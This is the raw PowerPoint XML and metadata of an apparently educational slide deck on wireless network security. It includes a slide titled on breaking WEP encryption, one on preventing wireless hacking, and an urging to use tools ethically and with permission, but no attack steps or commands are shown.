              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-114" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" spc="-195" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> etc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" b="1" spc="-370" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-65" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="105" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e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spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>m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spc="95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-170" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="240" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-95" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>y  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-175" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>d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w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-120" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>h  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-75" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>permission.</a:t>
            </a:r>
            <a:endParaRPr sz="3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4F7FC11-3BCF-5F4C-756E-DA6162AF46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4569852"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3048000" y="1079500"/>
          <a:ext cx="12192000" cy="452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0A6E5CD-235E-0C90-BB5E-955423509C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5280714"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3055374" y="4991100"/>
          <a:ext cx="12192000" cy="452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C1433A7-50A8-0E39-5CA8-AA3B6A029AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="313035"/>
            <a:ext cx="88483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How to Break WEP Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1986809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1084</TotalTime>
  <Words>1048</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom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-apple-system</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Franklin Gothic Medium</vt:lpstr>
      <vt:lpstr>inherit</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>SST W01 Light</vt:lpstr>
      <vt:lpstr>SST W01 Roman</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Trek</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Type of Wireless Encryption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Preventing  Wireless  Network  Hacking</vt:lpstr>
      <vt:lpstr>References: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design</dc:title>
  <dc:creator>Akash kumar som</dc:creator>
  <cp:keywords>DAFftUElzhM,BAD8BaPxSR8</cp:keywords>
  <cp:lastModifiedBy>Prashant Kumar</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-10T14:31:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-27T19:47:22Z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2023-04-10T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>Canva</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2023-04-10T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>